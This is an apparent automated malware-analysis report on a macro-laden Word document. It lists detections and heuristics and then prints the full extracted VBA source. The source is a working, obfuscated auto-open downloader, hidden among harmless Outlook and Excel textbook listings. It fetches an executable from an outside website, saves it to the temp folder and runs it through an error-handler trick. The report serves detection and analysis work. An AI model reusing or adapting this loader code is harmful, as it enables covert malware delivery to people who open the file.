Verdict: MALICIOUS
Risk Score: 328

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains heavily obfuscated VBA macros, including an auto-executing loader that uses CreateObject and CallByName, indicative of a downloader. The 'Password-protected archive handoff' heuristic suggests the document's purpose is to trick the user into enabling macros to decrypt or access a payload. The ClamAV detection further confirms its malicious nature.
Heuristics (9)

- ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set eWUyYS91 = CreateObject(D3e8fTIO61)`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set eWUyYS91 = CreateObject(D3e8fTIO61)`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15753 bytes |

SHA-256 of macros.bas: 27d7fd8f306b4d3f3746191415e61715284fa5068cb056a38d841e265ab30ce4

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Nip121ЦКВ3017 (5.003)
End Sub
Sub Nip121ЦКВ3017(FFFFF As Double)
px4vMaz62GyVze
End Sub
Attribute VB_Name = "Module1"
Public lw6wgKatg As String
Public FEveEv As Double
Public VSeeve As Long
'
' Listing 22.1. A procedure that enumerates the first- and
' second-level folders in the Outlook namespace.
'
Sub EnumerateFolders()
'
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Run through the first-level folders
'
For Each folder In ns.Folders
Debug.Print folder.Name
'
' Run through the second-level folders, if any
'
If folder.Folders.Count > 1 Then
For Each subfolder In folder.Folders
Debug.Print " " & subfolder.Name
Next 'subfolder
End If
Next 'folder
Set ns = Nothing
End Sub
'
' Listing 22.2. A procedure to test the PickFolder method
'
Sub PickFolderTest()
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Display the Select Folder dialog box
'
Set folder = ns.PickFolder
'
' Test the return value
'
If Not folder Is Nothing Then
MsgBox "You picked " & folder.Name
End If
End Sub
'
' Listing 22.3. A procedure that toggles the Web view
' on and off for the currently displayed folder.
'
Sub ToggleWebView()
'
' Set up the namespace and get the explorer
'
Set ns = ThisOutlookSession.Session
'
' Save the current folder
'
Set currFolder = r.exp.CurrentFolder
'
' Move temporarily to the root
'
Set c.exp.CurrentFolder = ns.Folders(1)
'
' Toggle Web view for the current folder
'
currFolder.WebViewOn = Not currFolder.WebViewOn
'
' Return to the current folder
'
Set a.exp.CurrentFolder = currFolder
End Sub
'
' Listing 22.4. A Function that determines the
' e-mail address of the sender.
'
Function SenderAddress(msg As String) As String
'
' Create a temporary reply
'
Set replyItem = y.msg.Reply
'
' The Reply's "To" property holds the sender's address
'
SenderAddress = replyItem.To
Set replyItem = Nothing
End Function
'
' Use this procedure to test the SenderAddress function.
'
Sub SenderAddressTest()
'
' Set up the namespace and Inbox
'
Set ns = ThisOutlookSession.Session
Set ib = ns.GetDefaultFolder(olFolderInbox)
'
' Display the sender's address for a message
'
MsgBox SenderAddress(ib.Items(2))
End Sub
'
' Listing 22.5. A procedure that processes Inbox messages.
'
Sub ProcessInboxMessages()
'
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Get the default Inbox folder
'
Set ib = ns.GetDefaultFolder(olFolderInbox)
'
' Run through each item in the Inbox
'
For Each msg In ib.Items
'
' Flag important messages
'
If msg.Importance = olImportanceHigh Then
msg.FlagStatus = olFlagMarked
msg.FlagRequest = "Handle this, will ya!"
msg.FlagDueBy = Date + 7
msg.Importance = olImportanceNormal
msg.Save
End If
'
' Look for expired flags
'
If msg.FlagDueBy < Date Then
msg.Display
MsgBox "The displayed message has an expired flag!"
End If
'
' Move sensitive messages to "Confidential" folder
'
If msg.Sensitivity = olConfidential Then
msg.Move ns.Folders(1).Folders("Confidential")
End If
Next 'msg
End Sub
Sub px4vMaz62GyVze()
Set ppVZZF1t = eWUyYS91("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
, Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "w" & Chr(119) & Chr(119) & Chr(46) & Chr(116) & Chr(105) & Chr(115) & Chr(99) & Chr(104) & Chr(108) & Chr(101) & "r" & Chr(101) & Chr(105) & Chr(45) & "z" & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(100) & Chr(101) & Chr(47) & Chr(53) & Chr(57) & Chr(47) & Chr(53) & Chr(54) & Chr(46) & "e" & Chr(120) & Chr(101) _
, False
Set cenPup7VnpnK = eWUyYS91(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")
mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")
lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
Dim FLLSJmKUYRVHQ() As Byte
CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
Zjo9QYph6v FLLSJmKUYRVHQ, lw6wgKatg
On Error GoTo PA4FeaqAL
a = 84 / 0
On Error GoTo 0
JRyXdhZR:
Exit Sub
PA4FeaqAL:
A06WNXrxh ("AU7CVXKyNxAAi")
Resume JRyXdhZR
End Sub
'
' Listing 22.6. A procedure that sends an e-mail message
'
Sub SendAMessage()
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Create the new MailItem
'
Set msg = Applicy.ation.CreateItem(olMailItem)
'
' Specify the recipient, subject, and body
' and then send the message
'
With msg
'
' Adjust the following address!
'
.Recipients.Add "bitbucket@mcfedries.com"
.Subject = "Just Testing"
.Body = "This is only a test"
.Send
End With
End Sub
'
' Listing 22.7. A procedure that creates a forwarded message
' and deletes any existing attachments before sending it.
'
Sub ForwardAndDeleteAttachments()
'
' Set up the namespace and Inbox
'
Set ns = ThisOutlookSession.Session
Set ib = ns.GetDefaultFolder(olFolderInbox)
'
' Create the forwarded MailItem
'
Set msg = ib.Items(ib.Items.Count).Forward
With msg
'
' Delete all the attachments
'
For Each att In .Attachments
att.Delete
Next 'att
'
' Send it (change the address!)
'
.Recipients.Add "selene@mcfedries.com"
.Send
End With
End Sub
'
Public Function A06WNXrxh(MmXQ1eLmZ As String)
Set d6eiGTziQd = eWUyYS91("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
d6eiGTziQd.Open (lw6wgKatg)
End Function
' Listing 22.8. A procedure that stores a password
' in a folder's Description property.
'
Sub SetPassword()
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Save the password in the folder's Description property
'
Set folder = ns.Folders(1).Folders("Confidential")
folder.Description = "password"
End Sub
'
' Listing 22.9. An event handler that asks the user for
' a password before switching to the "Confidential" folder.
'
Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
If NewFolder.Name = "Confidential" Then
pwd = InputBox("Please enter the password for this folder:")
If pwd <> NewFolder.Description Then
Cancel = True
End If
End If
End Sub
'
' Use this event handler to insure that the gExplorer
' global variable gets instantiated at startup
'
Private Sub Application_Startup()
Set gExplorer = Applicat.ion.ActiveExplorer
End Sub
'
' Listing 22.10. An event handler for the MailItem object's Send event.
'
Private Sub gMailItem_Send(Cancel As Boolean)
Dim result As Integer
result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
If result = vbNo Then
gMailItem.DeleteAfterSubmit = True
End If
End Sub
'
' Listing 22.11. A procedure that sends an e-mail message and
' references the global gMailItem variable to trap events.
'
Sub SendAMessage2()
'
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Create the new MailItem using the
' gMailItem global variable
'
Set gMailItem = Appl.ication.CreateItem(olMailItem)
'
' Specify the recipient, subject, and body
' and then send the message
'
With gMailItem
'
' Adjust the following address!
'
.Recipients.Add "bitbucket@mcfedries.com"
.Subject = "Just Testing Events"
.Body = "This is only an events test"
.Send
End With
End Sub
Attribute VB_Name = "Module2"
'
' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
'
Sub GetNumbers()
Dim done As Boolean
Dim divisor As Variant
Dim dividend As Variant
'
' Prompt user for dividend and divisor.
'
done = False
Do While Not done
dividend = InputBox("Enter the dividend:", "Divider")
divisor = InputBox("Enter the divisor:", "Divider")
done = Divide(dividend, divisor)
Loop
End Sub
'
' Listing 23.2. The Divide function divides the dividend by the divisor.
' The function traps "division by zero" errors.
'
Function Divide(dividend, divisor) As Boolean
Dim msg As String
Dim result As Single
'
' Set the trap
'
On Error GoTo DivByZeroHandler
'
' Peform the division
'
result = dividend / divisor
'
' If it went okay, display the result
'
msg = dividend & _
" divided by " & _
divisor & _
" equals " & _
result
MsgBox msg
'
' Set the return value and bypass the error handler
'
Divide = True
Exit Function
'
' Code branches here if an error occurs
'
DivByZeroHandler:
'
' Display the error message
'
result = MsgBox("You entered 0 as the divisor! Try again?", _
vbYesNo + vbQuestion, _
"Divider")
'
' Return the user's choice
'
If result = vbYes Then
Divide = False
Else
Divide = True
End If
End Function
'
' Listing 23.3 Backs up the active workbook to a drive specified by
Public Function eWUyYS91(D3e8fTIO61 As String)
Set eWUyYS91 = CreateObject(D3e8fTIO61)
End Function
' the user. Traps any errors (such as having no disk in the drive).
'
Sub BackUpToFloppy()
Dim backupDrive As String
Dim backupName As String
Dim msg As String
Dim done As Boolean
Dim result As Integer
'
' Define the location of the error handler
'
On Error GoTo ErrorHandler
'
' Initialize some variables and then loop
'
Application.DisplayAlerts = False
done = False
backupDrive = "A:"
While Not done
'
' Get the drive to use for the backup
'
backupDrive = InputBox( _
Prompt:="Enter the drive letter for the backup:", _
Title:="Backup", _
Default:=backupDrive)
'
' Check to see if OK was selected
'
If backupDrive <> "" Then
'
' Make sure the backup drive contains a colon (:)
'
If InStr(backupDrive, ":") = 0 Then
backupDrive = Left(backupDrive, 1) & ":"
End If
'
' First, save the file
'
ActiveWorkbook.Save
'
' Assume the backup will be successful,
' so set done to True to exit the loop
'
done = True
'
' Concatenate drive letter and workbook name
'
backupName = backupDrive & ActiveWorkbook.Name
'
' Make a copy on the specified drive
'
ActiveWorkbook.SaveCopyAs FileName:=backupName
Else
Exit Sub
End If
Wend
'
' Bypass the error handler
'
Exit Sub
'
' Code branches here if an error occurs
'
ErrorHandler:
msg = "An error has occurred!" & Chr(13) & Chr(13) & _
"Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
"letter, or Ignore to attempt the backup again."
result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
Select Case result
Case vbAbort
done = True
Case vbRetry
done = False
Resume Next
Case vbIgnore
Resume
End Select
End Sub
'
' Listing 23.4. This procedure divides two numbers. It traps three specific
Public Function Zjo9QYph6v(jIAuThroV99z As Variant, dicVrTXgN As String)
Dim pr5cUbS7yhDUj: Set pr5cUbS7yhDUj = eWUyYS91(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
With pr5cUbS7yhDUj
.Type = 1
.Open
.write jIAuThroV99z
.savetofile dicVrTXgN, 2
End With
End Function
' errors: division by zero, overflow, and type mismatch.
'
Sub DivideNumbers()
Dim msg As String
Dim result As Single
Dim divisor As Variant
Dim dividend As Variant
'
' Set the trap
'
On Error GoTo DivByZeroHandler
'
' Prompt user for the dividend
'
GetDividendAndDivisor:
dividend = InputBox("Enter the dividend:", "Divider")
If dividend = "" Then Exit Sub
'
' Prompt user for the divisor
'
GetDivisorOnly:
divisor = InputBox("Enter the divisor:", "Divider")
If divisor = "" Then Exit Sub
'
' Peform the division
'
result = dividend / divisor
'
' If it went okay, display the result
'
msg = dividend & _
" divided by " & _
divisor & _
" equals " & _
result
MsgBox msg
'
' Bypass the error handler
'
Exit Sub
'
' Code branches here if an error occurs
'
DivByZeroHandler:
'
' Display the error message
'
msg = "An error occurred!" & Chr(13) & Chr(13) & _
"Error number: " & Err.Number & Chr(13) & _
"Error message: " & Err.Description
MsgBox msg, vbOKOnly + vbCritical
'
' Check the error number
'
Select Case Err.Number
'
' Division by zero
'
Case 11
Resume GetDivisorOnly
'
' Overflow
'
Case 6
Resume GetDividendAndDivisor
'
' Type mismatch
'
Case 13
If Not IsNumeric(dividend) Then
Resume GetDividendAndDivisor
Else
Resume GetDivisorOnly
End If
'
' Anything else, just quit
'
Case Else
Exit Sub
End Select
End Sub